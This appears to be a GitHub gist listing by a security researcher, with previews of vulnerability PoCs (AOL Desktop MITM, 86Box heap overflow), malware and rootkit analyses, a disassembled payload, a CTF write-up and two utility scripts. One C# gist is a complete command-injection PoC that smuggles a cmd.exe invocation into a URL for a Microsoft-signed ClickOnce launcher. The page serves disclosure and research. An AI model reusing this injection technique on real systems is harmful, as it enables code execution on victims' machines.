Skip to content

Instantly share code, notes, and snippets.

@Wack0
Wack0 / ayy-oh-lmao.js
Last active December 8, 2015 03:42
AOL Desktop <= 9.8.1 FS Read/Write via MITM, <= 9.8.0 Remote Command Execution via MITM PoC
/*
ayy-oh-lmao.js
AOL Desktop <= 9.8.0 File Write and Remote Command Execution via MITM
AOL Desktop <= 9.8.1 File Write via MITM.
by slipstream/RoL, between August and December 2015.
irc.rol.im #rol ** http://rol.im/chat/ ** twitter @TheWack0lian
The custom AOL protocol, includes a scripting language called FDO91 (FDO), that's compiled into a bytecode.
Compiled FDO makes up part of the data sent from server to client and client to server.
@Wack0
Wack0 / adwareroi.md
Last active April 21, 2016 10:19
AdwareROI MiTM certificates and private keys

AdwareROI

AdwareROI is basically the world's shittiest MiTM malware ever.

It's being sold for $5.5k for one panel/binary, $16k for multiple panels/binaries, and probably ten times that if you want src too. That doesn't include the SSL MiTM functionality which is another $1k.

And.. as I said, it's shitty. The MiTM functionality relies on WinDivert, the SSL MiTM uses a custom component, which is (seriously!) called mitm_test_poc. And it uses a hardcoded CA cert and private key, that's installed with the other components.

So, what to do but disclose these as I obtain them?

@Wack0
Wack0 / programmatic_poc.cs
Last active December 14, 2016 19:28
Command injection in MS' One Step / DPLauncher / "Get ready for the Internet" application, for UAC / RCE through social engineering using MS signed exe / clickonce.
using System;
using System.Runtime.InteropServices;
class DPPwned {
[DllImport("dfshim.dll")]
public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags);
public static void Main() {
LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0);

Setup: https://www.virustotal.com/en/file/4280f729d317156706db6e9c87503d636f806e09efdfcf00e73dd3e71740c966/analysis/ App: https://www.virustotal.com/en/file/2260f04aff68f77102525c61ccab4680b869b27672f6939693b23c1c04c7fe82/analysis/ Unpacked + partially-deobfuscated: https://www.virustotal.com/en/file/f754f949651f628b3f1c1fbe327d7b87ea63ecdab6c59b8431d459e67b11cbd2/analysis/

Deobfuscated taskscheduler .xml string:

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2016-10-28T00:37:02.5049122</Date>
@Wack0
Wack0 / blob10_pass.php
Created January 20, 2017 22:37
Blobby 10 password generation algorithm
<?php
// Blobby 10 zip-password generation algorithm.
array_shift($argv);
foreach ($argv as $zip) {
$p = '[';
$firstchar = ord($zip[0]);
$whitelisted_zips = array(
'9EIAC5FD.ZIP',
@Wack0
Wack0 / mastostats.php
Last active April 19, 2017 16:01
CLI Mastodon network stats script. Uses instances.mastodon.xyz. Updates every 60 seconds.
<?php
// This class adapted from: https://www.if-not-true-then-false.com/2010/php-class-for-coloring-php-command-line-cli-scripts-output-php-output-colorizing-using-bash-shell-colors/
class Colors {
private static $foreground_colors = array(
'black'=>'0;30',
'dark_gray'=>'1;30',
'blue'=>'0;34',
'light_blue'=>'1;34',
'green'=>'0;32',
@Wack0
Wack0 / 86box-td0.php
Last active March 20, 2018 22:34
Heap Overflow in .TD0 File Parser in 86Box build 204/205 (200c966/d3d2699) Code Execution PoC
<?php
/*
Heap Overflow in .TD0 File Parser in 86Box build 204/205 (200c966/d3d2699) can cause code execution
calc.exe PoC for both builds (the x86 AMD and Intel binaries!)
a *Ring of Lightning* production by slipstream/RoL!
Please note that due to lack of available hardware, exploitation of the AMD binaries has not been tested.
So you may have to fix that yourself.
86Box is a fork of PCem maintained by Battler aka Tenshi aka Kiririn/RoL.
@Wack0
Wack0 / gist:f865ef369eb8c23ee028
Last active May 9, 2018 23:15
Komodia rootkit findings by @TheWack0lian

First off: this is the first time I "seriously" reversed a kernel-mode NT driver, so keep that in mind when you read this..

The Komodia rootkit config is located in a certain registry entry that's hardcoded in the driver. For Qustodio, it's HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\qwd\Data.

The config structure is simple enough. An array of the following structure:

DWORD type;
BYTE unknown[32]; // I don't see anywhere that the driver actually *reads* any of this part,
 // at least, not after writing to it first.
@Wack0
Wack0 / nit2016.asm
Created November 29, 2016 23:33
NIT2016? Very similar to the 2013 payload...
; Input MD5 : 614D07EF7777CFF5CFDF741587A097DA
; Input CRC32 : B326AB6B
; ---------------------------------------------------------------------------
; File Name : C:\Users\raylee\nit - Copy.bin
; Format : Binary file
; Base Address: 0000h Range: 0000h - 02FCh Loaded length: 02FCh
.686p
.mmx
@Wack0
Wack0 / zzazz_fools17.md
Created April 5, 2017 12:04
missingno.sav Game Boy reversing challenge (TheZZAZZ April Fools challenge 2017) writeup

missingno.sav Game Boy reversing challenge writeup

Introduction

On March 31st 2017, TheZZAZZGlitch released his April Fools 2017 event.
The event being a crafted save file for Pokémon Blue, it being a small game where you need to use memory patching or debugging techniques to beat it.

After you beat the game, a password is generated which allowed you to submit your score to the event website.
The best score (naturally, that score is 31337) can only be obtained by either patching the key-generation routine ("crackme"), or making your own keygen ("keygenme").
I, personally, did the latter.